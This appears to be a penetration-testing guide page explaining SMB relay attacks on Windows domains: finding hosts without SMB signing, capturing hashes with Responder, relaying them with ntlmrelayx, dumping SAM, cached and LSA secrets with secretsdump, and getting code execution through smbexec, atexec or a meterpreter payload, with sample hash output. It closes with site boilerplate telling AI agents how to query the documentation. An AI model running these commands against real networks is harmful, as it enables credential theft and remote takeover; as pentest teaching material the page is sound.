# SMB relay Instead of cracking hashes to find the clear password, you can relay those hashes to specific machines and potentially gain access. For refreshing our memory about the different types of NTLMs and Relaying 101 and pass-the-hash attack i suggest you read these 2 awesome posts : {% embed url="" %} {% embed url="" %} Now, this attack requires two things : * SMB signing must be disabled on the target * Relayed user credentials must be admin on the machine (we can't relay the hash to the same machine since MS08-068, and the user we're relaying must have admin rights on the target machine if we want code execution otherwise user access if there's an open-share for example) In order to relay hashes, we must have valid targets. Valid targets are, as predescribed, machines with SMB Signing disabled. So to get a list of those valide targets we can use for example [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec) ``` cme smb / --gen-relay-list Targets.txt ``` or [Nmap](https://github.com/nmap/nmap) : ``` nmap --script=smb2-security-mode.nse -p445 ``` **NOTE: By default, SMB signing is enabled on all DC servers**\ \ Now off to capture the hashes, but we first need to change a little configuration in the responder.conf file (/usr/share/responder/responder.conf) ``` [Responder Core] ; Servers to start SQL = On SMB = Off # Turn this off Kerberos = On FTP = On POP = On SMTP = On IMAP = On HTTP = Off # Turn this off HTTPS = On DNS = On LDAP = On ``` Then again fire up responder : ``` python responder.py -I -rdwv ``` Now off to the relay, pop up a new shell and use [ntlmrelayx.py](https://github.com/SecureAuthCorp/impacket) to relay the intercepted hashes : ``` ntlmrelayx.py -tf Targets.txt -socks -smb2support ``` You should be seeing something cool appearing on your ntlmrelay window. Now while that's cool, what can we do with the opened sessions ? if you tap socks you should see something like that : ``` ntlmrelayx> socks Protocol Target Username Port -------- -------------- ------------------------ ---- SMB 192.168.48.38 VULNERABLE/NORMALUSER3 445 MSSQL 192.168.48.230 VULNERABLE/ADMINISTRATOR 1433 MSSQL 192.168.48.230 CONTOSO/NORMALUSER1 1433 SMB 192.168.48.230 VULNERABLE/ADMINISTRATOR 445 SMB 192.168.48.230 CONTOSO/NORMALUSER1 445 SMTP 192.168.48.224 VULNERABLE/NORMALUSER3 25 SMTP 192.168.48.224 CONTOSO/NORMALUSER1 25 IMAP 192.168.48.224 CONTOSO/NORMALUSER1 143 ``` To interact with these sessions we'll use the tool [proxychains](https://github.com/haad/proxychains), but first you need to edit the conf file found in /etc/proxychains.conf: ``` [ProxyList] socks4 1080 ``` Now that's done, you can for example retrieve local hashes using [secretsdump](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py) ```bash # proxychains ./secretsdump.py vulnerable/Administrator@192.168.48.230 ProxyChains-3.1 (http://proxychains.sf.net) Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies Password: |S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK [*] Service RemoteRegistry is in stopped state [*] Starting service RemoteRegistry [*] Target system bootKey: 0xa6016dd8f2ac5de40e5a364848ef880c [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:aeb450b6b165aa734af28891f2bcd2ef::: Guest:501:aad3b435b51404eeaad3b435b51404ee:40cb4af33bac0b739dc821583c91f009::: HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:ce6b7945a2ee2e8229a543ddf86d3ceb::: [*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain) pcadminuser2:6a8bf047b955e0945abb8026b8ce041d:VULNERABLE.CONTOSO.COM:VULNERABLE::: Administrator:82f6813a7f95f4957a5dc202e5827826:VULNERABLE.CONTOSO.COM:VULNERABLE::: normaluser1:b18b40534d62d6474f037893111960b9:CONTOSO.COM:CONTOSO::: serviceaccount:dddb5f4906fd788fc41feb8d485323da:VULNERABLE.CONTOSO.COM:VULNERABLE::: normaluser3:a24a1688c0d71b251efec801fd1e33b1:VULNERABLE.CONTOSO.COM:VULNERABLE::: [*] Dumping LSA Secrets [*] $MACHINE.ACC VULNERABLE\WIN7-A$:aad3b435b51404eeaad3b435b51404ee:ef1ccd3c502bee484cd575341e4e9a38::: [*] DPAPI_SYSTEM 0000 01 00 00 00 1C 17 F6 05 23 2B E5 97 95 E0 E4 DF ........#+...... 0010 47 96 CC 79 1A C2 6E 14 44 A3 C1 9E 6D 7C 93 F3 G..y..n.D...m|.. 0020 9A EC C6 8A 49 79 20 9D B5 FB 26 79 ....Iy ...&y DPAPI_SYSTEM:010000001c17f605232be59795e0e4df4796cc791ac26e1444a3c19e6d7c93f39aecc68a4979209db5fb2679 [*] NL$KM 0000 EB 5C 93 44 7B 08 65 27 9A D8 36 75 09 A9 CF B3 .\.D{.e'..6u.... 0010 4F AF EC DF 61 63 93 E5 20 C5 4F EF 3C 65 FD 8C O...ac.. .O.-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK ``` Or even get code execution via : [smbexec](https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbexec.py), [atexec ](https://github.com/SecureAuthCorp/impacket/blob/master/examples/atexec.py)and others ```bash proxychains smbexec.py /@192.168.10.60 ``` ```bash proxychains atexec.py /@192.168.10.60 "" ``` You can even specify the commands you want to execute before launching ntlmrelayx : ```bash ntlmrelayx.py -tf targets.txt -socks -smb2support -c "whoami" ``` or even set a meterpreter listeneter and get shell access via metasploit : ```bash ntlmrelayx.py -tf targets.txt -socks -smb2support -e test.exe ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://xedex.gitbook.io/internalpentest/internal-pentest/active-directory/initial-attack-vectors/llmnr-nbt-ns-poisoning/smb-relay.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.